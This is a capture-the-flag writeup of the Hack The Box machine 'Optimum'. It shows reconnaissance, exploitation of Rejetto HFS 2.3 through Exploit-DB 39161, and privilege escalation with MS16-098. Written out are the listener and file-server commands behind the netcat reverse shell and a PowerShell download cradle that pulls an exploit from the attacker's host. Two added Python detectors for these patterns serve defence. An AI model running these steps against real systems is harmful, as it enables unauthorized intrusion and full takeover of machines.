Hack The Box — Optimum Writeup

Let’s get started! :)

Reconnaissance

This is the initial step in order to scan the open services in the machine.

COMMAND: nmap -sC -sV -O -oA optium 10.10.10.8

  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect the OS (operating system)
  • -oA: output all formats and store in file optium

We got the following result, which shows that only one port is open.

  • Port 80: running HttpFileServer httpd 2.3.

Let’s run a full-port nmap scan to find out whether any other ports are open on the box.

COMMAND: nmap -sC -sV -O -p- -oA optiumFULL 10.10.10.8

We got the result, but no ports other than port 80 are open. :(

Let’s scan UDP ports as well, to check whether any UDP services are alive on the machine.

COMMAND: nmap -sU -O -p- -oA optiumUDP 10.10.10.8

We didn’t get any open UDP ports. :(

Let’s check the web server running on port 80.

Enumeration

Browse to the HTTP File server.

URL: http://10.10.10.8

It seems that this server version has a known exploit that can be used to gain complete remote access.

Let’s google for an exploit. :)

httpfileserver 2.3

The first two Google results will help us gain complete remote access to the machine.

Let’s open the first Google result and read its instructions for the next step.

In order to run the exploit, we need to do the following:

  1. Host a web server on our attack machine (kali) on port 80 in a directory that has the netcat executable file.
  2. Start a netcat listener on the attack machine.
  3. Download the exploit and change the ip_addr & local_port variables in the script to match the ip address of the attack machine and the port that netcat is listening on.
  4. Run the script using python as stated in the Usage comment.

Let’s understand the exploit first then we will proceed further.

Everything in yellow (in double quotes) is URL encoded. Let’s decode it using an online encoder/decoder.

URL Decoded Exploit

In the exploit, three functions are called:

  • script_create(): creates a script (script.vbs) that when run downloads the nc.exe from our attack machine and saves it to the C:\Users\Public\ location on the target machine.
  • execute_script(): uses cscript.exe (the command-line version of the Windows Script Host, which provides command-line options for setting script properties) to run script.vbs.
  • nc_run(): runs the netcat executable and sends a reverse shell back to our attack machine.

Now that we understand what the script is doing, what remains to be answered is why remote code execution was possible at all. Further googling gives the reason.

The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aka HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.

This makes sense. In the exploit, every time a search request is used to run arbitrary code, the %00 sequence is present in it.
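From the defender’s side, the same fact gives a simple detection: any request whose search parameter decodes to a value containing a NUL byte is not a legitimate file search. The following is an added example, not code from the original writeup or from HFS itself; it assumes the server logs requests in Common Log Format and that the search query parameter is named `search`, and the log lines it scans are constructed for the example rather than captured from the box.

```python
"""Flag HTTP requests carrying a NUL byte in the HFS 'search' parameter.

Added example, not part of the original writeup. It scans access-log lines
for a 'search' query value that contains %00 (URL-encoded NUL), the marker
the writeup ties to the findMacroMarker bug in HFS 2.3x before 2.3c.
Assumption: Common Log Format and a query parameter literally named 'search'.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Oct/2019:10:01:02 +0000] "GET / HTTP/1.1" 200 1532
10.0.0.5 - - [05/Oct/2019:10:01:09 +0000] "GET /?search=report.pdf HTTP/1.1" 200 412
10.0.0.9 - - [05/Oct/2019:10:02:31 +0000] "GET /?search=%00abc HTTP/1.1" 200 87
10.0.0.9 - - [05/Oct/2019:10:02:35 +0000] "GET /?search=test%00%41 HTTP/1.1" 200 87
"""

# Common Log Format: client ip, identity, user, [timestamp], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)


def nul_in_search(target: str) -> bool:
    """True if the request target has a 'search' parameter whose decoded value contains NUL."""
    query = urlsplit(target).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl percent-decodes, so %00 arrives here as a real NUL character
        if key.lower() == "search" and "\x00" in value:
            return True
    return False


def find_suspicious(log_text: str) -> list:
    """Return one record per log line that matches the NUL-in-search pattern."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        if nul_in_search(m["target"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"]})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['target']}")
```

Run against the constructed sample, the two requests from 10.0.0.9 are reported and the ordinary `search=report.pdf` request is not. Decoding before matching matters: a rule that only greps the raw line for the literal `%00` would miss mixed-case or otherwise re-encoded variants that still decode to a NUL byte.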

Gaining an Initial Foothold

Now that we understand the exploit, let’s run it. In the instructions, the first step is to host a web server on our attack machine (kali) on port 80 in a directory that has the netcat executable file.

Locate the Windows netcat executable on the Kali VM.

COMMAND: locate nc.exe

Now let’s copy it to the current directory, from which we will run a Python HTTP server. Any folder will do, as long as the server is started from that folder.

COMMAND: cp /usr/share/windows-resources/binaries/nc.exe .

The dot (.) specifies the current directory as the copy destination.

Now let’s run the Python server on port 80, since that is the port the exploit expects to fetch nc.exe from.

COMMAND: python -m SimpleHTTPServer 80

If it says no module named SimpleHTTPServer, you are running Python 3, where the same module is called http.server:

COMMAND: python3 -m http.server 80

The next step is to start a netcat listener on the attack machine.

COMMAND: nc -nlvp 5555


The next step is to download the exploit and change the ip_addr & local_port variables in the script to match the ip address of the attack machine and the port that netcat is listening on.

Let’s search for the exploit in the Exploit Database using searchsploit.

COMMAND: searchsploit 39161


Let’s copy the exploit to our current folder and edit the exploit.

COMMAND: searchsploit -m 39161

Let’s edit the exploit using nano.

COMMAND: nano 39161.py

Change ip_addr to the IP address of your attack machine and local_port to the port the netcat listener is on (5555).

Let’s save and run the exploit.

COMMAND: python 39161.py 10.10.10.8 80

We get a non-privileged shell back!

Let’s get the user flag. :)

As this shell is a non-privileged one, we need to use privilege escalation techniques in order to gain Administrator access and also the root flag. :)

Privilege Escalation

We’ll use Windows Exploit Suggester to identify any missing patches on the Windows target machine that could potentially allow us to escalate privileges.

First, download the script. :)

COMMAND: git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git

Now update the xlrd module.

COMMAND: pip install xlrd --upgrade

Now update the database of Windows-Exploit-Suggester.

COMMAND: ./windows-exploit-suggester.py --update

This creates an Excel spreadsheet from the Microsoft vulnerability database in the working directory.

The next step is to retrieve the system information from the target machine. This can be done using the “systeminfo” command.

Now copy the output of systeminfo and save it as sysinfo.txt on the attack machine.

Now use the windows-exploit-suggester tool to get a list of possible exploits.

COMMAND: chmod +x windows-exploit-suggester.py

COMMAND: ./windows-exploit-suggester.py --database 2019-10-05-mssb.xls --systeminfo sysinfo.txt

The Windows OS seems to be vulnerable to many exploits! Let’s try MS16-098. The Exploit Database entry gives a link to a precompiled executable. Download the executable on the attack machine.

COMMAND: wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

Now we need to transfer it to the target machine. Start an HTTP server on the attack machine in the same directory as the executable.

COMMAND: python -m SimpleHTTPServer 9005

On the target machine, download the file into a directory you have write access to.

COMMAND: powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.28:9005/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"
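That one-line PowerShell download is exactly what shows up in process-creation telemetry on the target (Windows Security event 4688 with command-line auditing enabled, or Sysmon event 1), which makes it a useful thing for a blue team to alert on. The following detector is an added example, not code from the original writeup; the command lines it scans are constructed, and the host and file names in them are placeholders.

```python
"""Flag PowerShell WebClient download cradles in process command lines.

Added example, not part of the original writeup. Given command-line strings
from process-creation events, it reports those that spawn PowerShell with a
System.Net.WebClient DownloadFile/DownloadString call and extracts the URL.
The sample command lines are constructed; hosts and file names are placeholders.
"""
import re

# Constructed process command lines (not real telemetry).
SAMPLE_CMDLINES = [
    "powershell -c \"(new-object System.Net.WebClient).DownloadFile("
    "'http://192.0.2.10:9005/tool.exe', 'c:\\Users\\Public\\Downloads\\tool.exe')\"",
    "powershell.exe -NoProfile -Command \"Get-ChildItem C:\\Users\\Public\"",
    "C:\\Windows\\System32\\cmd.exe /c dir",
    "powershell -c \"(New-Object Net.WebClient).DownloadString('https://192.0.2.10/x')\"",
]

POWERSHELL_RE = re.compile(r"\bpowershell(?:\.exe)?\b", re.IGNORECASE)
# 'System.' prefix is optional in PowerShell type names, so match both spellings
WEBCLIENT_RE = re.compile(r"new-object\s+(?:System\.)?Net\.WebClient", re.IGNORECASE)
METHOD_RE = re.compile(r"\.(DownloadFile|DownloadString)\s*\(", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def classify_cmdline(cmdline: str):
    """Return {'method', 'url'} for a WebClient download cradle, else None."""
    if not POWERSHELL_RE.search(cmdline):
        return None
    if not WEBCLIENT_RE.search(cmdline):
        return None
    method = METHOD_RE.search(cmdline)
    if not method:
        return None
    url = URL_RE.search(cmdline)
    return {"method": method.group(1), "url": url.group(0) if url else None}


def scan(cmdlines) -> list:
    """Return one record per command line that looks like a download cradle."""
    hits = []
    for cmdline in cmdlines:
        result = classify_cmdline(cmdline)
        if result:
            hits.append({"cmdline": cmdline, **result})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_CMDLINES):
        print(f"{hit['method']:<14} {hit['url']}")
```

Matching is case-insensitive and tolerant of the `System.` prefix being dropped, because PowerShell accepts both; a rule keyed on the exact string from a single writeup would miss trivial rewordings. Pairing the extracted URL with the source host in the event gives the responder the download origin to pivot on.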

Run the exploit. :)

BOOM! We got Administrator access. :)

Go to the Administrator’s Desktop folder and get the root.txt flag. :)

If you like my writeup, give me respect on my HTB profile: Exp1o1t9r
